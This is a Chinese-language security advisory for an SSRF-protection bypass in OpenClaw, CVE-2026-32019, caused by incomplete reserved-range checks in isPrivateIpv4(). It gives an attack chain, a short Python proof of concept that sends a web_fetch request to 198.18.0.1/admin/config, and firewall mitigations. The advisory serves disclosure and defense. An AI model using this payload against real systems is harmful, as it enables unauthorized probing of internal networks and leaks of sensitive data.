CVE-2026-32019 CVSS 7.4 高危

CVE-2026-32019 OpenClaw SSRF防护绕过漏洞

披露日期: 2026-03-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32019

漏洞类型

SSRF (服务器端请求伪造)

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.22 之前的版本存在一个安全漏洞。其 isPrivateIpv4() 函数对 IPv4 特殊用途范围的验证不完整，导致攻击者可以绕过 SSRF（服务器端请求伪造）策略检查。攻击者利用 web_fetch 功能，能够访问本应被阻止的 RFC 保留地址（如 198.18.0.0/15），从而可能探测内网服务或获取敏感信息。

技术细节

该漏洞根因在于 OpenClaw 使用的 isPrivateIpv4() 函数未能正确覆盖所有 RFC 规定的特殊用途 IPv4 地址范围。通常 SSRF 防护机制会检查目标 IP 是否属于内网地址（如 10.0.0.0/8, 192.168.0.0/16 等），但该实现遗漏了部分非全局地址段（例如基准测试网段 198.18.0.0/15）。攻击者通过构造包含这些特定 IP 地址的请求，利用 web_fetch 接口发送给服务器。由于验证逻辑缺陷，服务器认为该 IP 是合法的外网地址并代为请求，实际上却将请求发送到了受保护的内部或保留网段。这不仅违反了 SSRF 防御策略，还可能导致敏感元数据泄露或内部网络被扫描。

攻击链分析

STEP 1

1. 侦察与定位

攻击者发现目标使用了 OpenClaw 组件，且版本低于 2026.2.22。

STEP 2

2. 构造恶意请求

攻击者构造针对 web_fetch 接口的请求，将目标 URL 设为 RFC 保留地址（如 198.18.0.1）。

STEP 3

3. 绕过验证

OpenClaw 的 isPrivateIpv4() 函数未能识别该 IP 为受限地址，通过 SSRF 检查。

STEP 4

4. 信息泄露

服务器代理请求并返回 198.18.0.1 的响应，攻击者成功获取受限网段信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-32019
# This script demonstrates bypassing the incomplete IPv4 validation
# by targeting the 198.18.0.0/15 range (RFC 2544).

import requests

target_url = "http://vulnerable-openclaw-instance/api/web_fetch"
# Use an IP from the RFC 2544 benchmarking range
banned_ip = "198.18.0.1"

payload = {
    "url": f"http://{banned_ip}/admin/config"
}

try:
    response = requests.post(target_url, json=payload)
    if response.status_code == 200:
        print("[+] SSRF bypass successful! Response received:")
        print(response.text)
    else:
        print("[-] Request failed.")
except Exception as e:
    print(f"Error: {e}")

影响范围

OpenClaw < 2026.2.22

防御指南

临时缓解措施

如果无法立即升级，应在防火墙或 WAF 层面拦截对 198.18.0.0/15 及其他 RFC 保留网段的出站流量，或临时禁用 web_fetch 功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表